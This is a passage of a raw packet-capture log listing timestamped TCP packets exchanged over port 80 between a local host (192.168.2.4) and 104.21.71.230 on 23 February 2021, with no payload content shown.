Feb 23, 2021 15:31:13.568985939 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569003105 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569020033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569035053 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569040060 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.569077015 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.569099903 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.569834948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569868088 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569889069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569909096 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569933891 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.569955111 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.570002079 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.570688009 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.570722103 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.570744991 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.570770025 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.570792913 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.570802927 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.570854902 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.570907116 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.571537971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.571568966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.571590900 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.571616888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.571641922 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.571644068 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.571669102 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.572346926 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.572381973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.572407007 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.572431087 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.572447062 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.572457075 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.572467089 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.572504997 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.573172092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573201895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573226929 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573272943 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.573632002 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573659897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573687077 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573713064 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573735952 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573738098 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.573761940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.573821068 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.574626923 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.574664116 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.574693918 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.574721098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.574744940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.574769974 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.574774981 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.575139999 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.575144053 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.576141119 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576179028 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576203108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576226950 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576248884 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576262951 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.576272011 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576344013 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.576586962 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576615095 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576638937 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576649904 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.576666117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576684952 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.576693058 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576719046 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.576776981 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.577050924 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.577570915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.577605009 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.577626944 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.577646971 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.577649117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.577672958 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.577673912 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.577702999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.577749968 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.578541040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.578572035 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.578598022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.578599930 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.578623056 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.578646898 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.578666925 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.578671932 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.578689098 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.579499006 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.579525948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.579541922 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.579567909 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.579586029 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.579595089 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.579605103 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.579726934 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.580426931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.580459118 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.580482006 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.580497026 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.580537081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.580543995 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.580564022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.580590010 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.580607891 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.581415892 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.581459045 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.581486940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.581513882 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.581540108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.581547022 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.581562996 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.581582069 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.581587076 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.582295895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.582329988 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.582355022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.582379103 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.582405090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.582417965 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.582427025 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.582434893 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.582444906 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.583205938 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.583236933 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.583260059 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.583281994 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.583296061 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.583307981 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.583309889 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.583331108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.583353996 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.584125996 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.584150076 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.584167004 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.584183931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.584199905 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.584227085 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.584234953 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.584264040 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.584292889 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.584992886 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585017920 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585037947 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585057974 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585072041 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.585078955 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585102081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585107088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.585129023 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.585866928 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585894108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585912943 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585935116 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585953951 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585964918 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.585973978 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.585999966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.586004972 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.586105108 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.586765051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.586790085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.586812019 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.586847067 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.693099976 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.756906033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822094917 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822120905 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822138071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822153091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822170019 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822189093 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822191954 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822208881 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822228909 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822243929 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822244883 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822249889 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822268009 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822288036 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822289944 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822305918 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822323084 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822335005 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822339058 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822386026 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822438955 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822454929 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822474957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822487116 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822503090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822529078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822546959 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822549105 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822561026 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822577000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822592974 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822597980 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822617054 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822630882 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.822634935 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.822691917 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.823165894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823185921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823205948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823224068 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823240995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823256969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823256016 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.823273897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823292971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823292971 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.823312044 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823328972 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823337078 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.823348999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823367119 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.823367119 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823385000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823400974 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.823410034 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.823445082 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.824069977 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.824090004 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.824106932 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.824124098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.824140072 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.824157000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.824167967 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.824170113 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.824217081 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.824242115 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.824986935 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825007915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825026989 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825042009 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825058937 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825073957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825090885 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825108051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825124025 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825145006 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825162888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825177908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825193882 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825205088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825211048 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825226068 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825231075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825233936 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825247049 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825436115 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825455904 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825475931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825498104 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825519085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825522900 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825545073 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825556993 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825568914 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825586081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825593948 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825603008 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825619936 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825629950 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.825648069 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.825798988 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.826132059 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826150894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826169014 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826184988 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826201916 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826219082 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826239109 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826258898 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826262951 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.826276064 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826282024 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.826284885 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.826293945 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826309919 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826325893 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826350927 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826366901 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.826370001 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.826400995 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.826421022 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.827080965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.827100992 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.827116966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.827132940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.827152967 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.827156067 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.827176094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.827199936 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.827229023 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.830972910 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.830996037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831012964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831031084 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831048012 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831063986 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831077099 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831089973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831093073 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831106901 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831120014 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831130981 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831137896 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831140995 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831155062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831160069 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831168890 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831187010 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831248999 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831295013 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831433058 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831461906 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831484079 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831522942 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831542969 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831547022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831564903 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831572056 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831593037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831614017 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831633091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831651926 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831665993 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.831743002 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.831777096 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.832087040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832108974 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832128048 CET	80	49752	104.21.71.230	192.168.2.4
